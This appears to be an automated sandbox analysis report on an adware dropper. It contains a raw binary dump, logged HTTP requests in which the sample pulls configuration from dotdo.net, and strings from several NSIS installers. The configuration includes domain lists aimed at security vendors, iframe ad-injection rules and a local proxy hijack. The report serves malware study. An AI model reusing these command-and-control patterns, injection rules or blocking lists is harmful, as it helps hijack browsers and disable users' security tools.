M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /ckkk.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:31 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT
ETag: "1d6000000029282-91-50a497515eff0"
Accept-Ranges: bytes
Content-Length: 145
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>..</body>..</html>..HTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:31 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>..</body>..</html>......
GET /act/txt/hho.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 4084
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
VVV.later-download.com.later-download.com.VVV.evodownload.com.evodownload.com.cdn.castplatform.com.m3.zlvijp.com.zonealarm.com.VVV.zonealarm.com.download.zonealarm.com.VVV.malwarebytes.org.malwarebytes.org.d.instashareonline.com.instashareonline.com.VVV.instashareonline.com.cdn.optimizely.com.fp114.digitaloptout.com.VVV.superfish.com.superfish.com.static.scanscout.com.z7hcp7lnkxu.st31g1duz2.com.ads.pubmatic.com.f-secure.com.VVV.f-secure.com.gripdownload.co.d.jazzedcdn.com.VVV.gripdownload.co.360safe.com.VVV.360safe.com.comodo.com.VVV.comodo.com.personalfirewall.comodo.com.comodo-internet-security.en.softonic.com.srv.quikdisplay.com.VVV.dimtron.com.dimtron.com.d.gettvwizard.com.d.instashareonline.com.instashareonline.com.VVV.instashareonline.com.apiboxrockinfo-a.akamaihd.net.b3.playfizz.com.apitechgilenet-a.akamaihd.net.d2d6i1lejl34hs.cloudfront.net.jelly.hatonafish.com.nps.donutleads.com.app.donutleads.com.istatic.datafastguru.info.pstatic.datafastguru.info.static.datafastguru.info.datafastguru.info.VVV.datafastguru.info.jsgnr.datafastguru.info.cdn.sharedaddomain.com.VVV.sharedaddomain.com.cdn.sharedaddomain.com.besttv39.cdn.it.best-tv.com.nps.donutleads.com.VVV.donutleads.com.donutleads.com.securepaths.com.VVV.securepaths.com.upgrade-software.org.VVV.upgrade-software.org.nps.pastaleads.com.pastaleads.com.www.pastaleads.com.app.pastaleads.com.74faa29e28b0e.com.VVV.74faa29e28b0e.com.VVV.safedownloadsrus108.com.safedownloadsrus108.com.VVV.v4download.com.v4download.com.VVV.v4download2.biz.v4download2.biz.VVV.4fbd0
<<< skipped >>>
GET /act/txt/uur.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 2093
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
kds.adspirit.de/adscript.php?pid=133&ord=[timestamp]..VVV.download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..download.cnet.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..majorgeeks.com/files/details/malwarebytes_anti_malware.html..VVV.majorgeeks.com/files/details/malwarebytes_anti_malware.html..VVV.microsoft.com/en-us/download/confirmation.aspx?id=9905..microsoft.com/en-us/download/confirmation.aspx?id=9905..ads.pubmatic.com/AdServer/js/showad.js..download.cnet.com/Comodo-Internet-Security-Premium/3000-2239_4-10460704.html..filehippo.com/download_comodo..VVV.filehippo.com/download_comodo..VVV.tomsguide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..tomsguide.com/us/download/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..VVV.pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/article2/0,2817,2457135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..b.scorecardresearch.com/beacon.js..d.gettvwizard.com/l/load.js..d.instashareonline.com/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23DDUS&bp=PB3&g=a636a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/download_malwarebytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..VVV.filehippo.com/download_malwarebytes_anti_malware/59476..filehippo.com/download_malwarebytes_anti_malware/59476..origin.languages.malwarebytes.org/downloads/..download.cnet.com/Malwarebytes-Anti-Malware/
<<< skipped >>>
GET /act/txt/vv.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 29 Aug 2015 11:59:12 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
5d26..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div class="mapAndAttrs"><iframe width="300" height="250" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><button class="reply_button js-only">..all;;;;;;;;;;;<header class="bchead">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><header class="bchead">..all;;;;;;;;;;;<ul class="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=http://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe><br><ul class="clfooter">..kds.adspirit.de;;;;;;;;;;;top.location.href;;;;;;;;;;;abcd..installpath.com;;;;;;;;;;;<div style="margin:0 auto; width:320px; height:270px;">;;;;;;;;;;;<iframe width="850" height="480" scrolling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexRB.php?a=11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;;;;;;;
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
wincheckfe.exe_1768:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\FindProcDLL.dll
.reloc
Kernel32.DLL
PSAPI.DLL
FindProcDLL.dll
System.dll
callback%d
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp
nsw6.tmp
C:\a\wincheckfe.exe
wincheckfe.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
DYK287G2Jhwy64P0Ln0s.exe_1012:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
ication Data\apDYK287G2Jhwy64P0Ln0s.html
rome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
Override: || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
9Â9|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
%Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html
A~loogg2.txt
hwy64P0Ln0s.html
PDYK2~1.HTM
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp\inetc.dll
tml/fide/lo2DYK287G2Jhwy64P0Ln0s.txt
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB.tmp
1464376
winonit.exe
0Ln0s.exe
1495012
C:\a\DYK287G2Jhwy64P0Ln0s.exe
DYK287G2Jhwy64P0Ln0s.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
http=127.0.0.1:8877;https=127.0.0.1:8877
C:\a\internetport3.exe
6.0.2900.5512
63839615.bat
.exe" -n vmusr
wcheckf.exe
wincheckfe.exe
Nullsoft Install System v2.46
ttps=127.0.0.1:8877
tport3.exe
5.bat
port3.exe
Tools\vmtoolsd.exe" -n vmusr
DYK287G2Jhwy64P0Ln0s.exe_1012_rwx_10004000_00001000:
callback%d
wincheckfe.exe_1768_rwx_10004000_00001000:
callback%d
wcheckf.exe_484:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
%Program Files%\Google\Chrome\Application\chrome.exe
e.exe
a\Google\Chrome\Application\chrome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
on\Internet Settings AutoConfigURL
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp\FindProcDLL.dll
@.reloc
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
!%[ %S
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
nsg8.tmp
ogram Files\Google\Chrome\Application\chrome.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg8.tmp
C:\a\wcheckf.exe
wcheckf.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
wcheckf.exe_484_rwx_10004000_00001000:
callback%d
winonit.exe_1360:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp\KillProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp
.reloc
Kernel32.DLL
PSAPI.DLL
MSVCRT.dll
KillProcDLL.dll
u.Uj@
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
\.lR%
g.ZO||k[
C:\a\avv.txt
avv.txt
m\LOCALS~1\Temp\nshA.tmp
ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshA.tmp
C:\a\winonit.exe
winonit.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
winonit.exe_1360_rwx_10004000_00001000:
callback%d
getcap.exe_500:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\a\7za.exe
\a\7za.exe
S~1\Temp\nsyD.tmp\System.dll
S~1\Temp\nsyD.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
C:\a\ukey.ini
C:\a\ukey.ini
7za.exe
7za.exe
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp\System.dll
GetCPInfo
GetCPInfo
MB, # %s =
MB, # %s =
RAM %s
RAM %s
Data Error in encrypted file. Wrong password?
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Unsupported Method
Can not open encrypted archive. Wrong password?
Can not open encrypted archive. Wrong password?
Unsupported archive type
Unsupported archive type
-p{Password}: set Password
-p{Password}: set Password
is not supported archive
is not supported archive
Enter password (will not be echoed):
Enter password (will not be echoed):
Advapi32.dll
Advapi32.dll
kernel32.dll
kernel32.dll
update operations are not supported for this archive
update operations are not supported for this archive
Mapi32.dll
Mapi32.dll
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
lzma 7z ace arc arj bz bz2 deb lzo lzx gz pak rpm sit tgz tbz tbz2 tgz cab ha lha lzh rar zoo zip jar ear war msi 3gp avi mov mpeg mpg mpe wmv aac ape fla flac la mp3 m4a mp4 ofr ogg pac ra rm rka shn swa tta wv wma wav swf chm hxi hxs gif jpeg jpg jp2 png tiff bmp ico psd psp awg ps eps cgm dxf svg vrml wmf emf ai md cad dwg pps key sxi max 3ds iso bin nrg mdf img pdi tar cpio xpi vfd vhd vud vmc vsv vmdk dsk nvram vmem vmsd vmsn vmss vmtm inl inc idl acf asa h hpp hxx c cpp cxx rc java cs pas bas vb cls ctl frm dlg def f77 f f90 f95 asm sql manifest dep mak clw csproj vcproj sln dsp dsw class bat cmd xml xsd xsl xslt hxk hxc htm html xhtml xht mht mhtml htw asp aspx css cgi jsp shtml awk sed hta js php php3 php4 php5 phptml pl pm py pyo rb sh tcl vbs text txt tex ans asc srt reg ini doc docx mcw dot rtf hlp xls xlr xlt xlw ppt pdf sxc sxd sxi sxg sxw stc sti stw stm odt ott odg otg odp otp ods ots odf abw afp cwk lwp wpd wps wpt wrf wri abf afm bdf fon mgf otf pcf pfa snf ttf dbf mdb nsf ntf wdb db fdb gdb exe dll ocx vbx sfx sys tlb awx com obj lib out o so pdb pch idb ncb opt
OLEAUT32.dll
OLEAUT32.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
E%SsK*X|
E%SsK*X|
, .MN6b
, .MN6b
1%uhx
1%uhx
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
ukey.ini
ukey.ini
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsyD.tmp
C:\a\getcap.exe
C:\a\getcap.exe
getcap.exe
getcap.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiC.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiC.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Nullsoft Install System v2.46
Nullsoft Install System v2.46
H7zCon.sfx
7-Zip cannot load Mapi32.dll
A* * .tar .tar
B* .tar
getcap.exe_500_rwx_10004000_00001000:
callback%d
vchk.exe_1976:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
9Â9|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
C:\a\avchk.txt
avchk.txt
\LOCALS~1\Temp\nsiF.tmp
hk.txt
cketTab1.exe
e.exe
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
vchk.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
RocketTab1.exe
Nullsoft Install System v2.46
vchk.exe_1976_rwx_10004000_00001000:
callback%d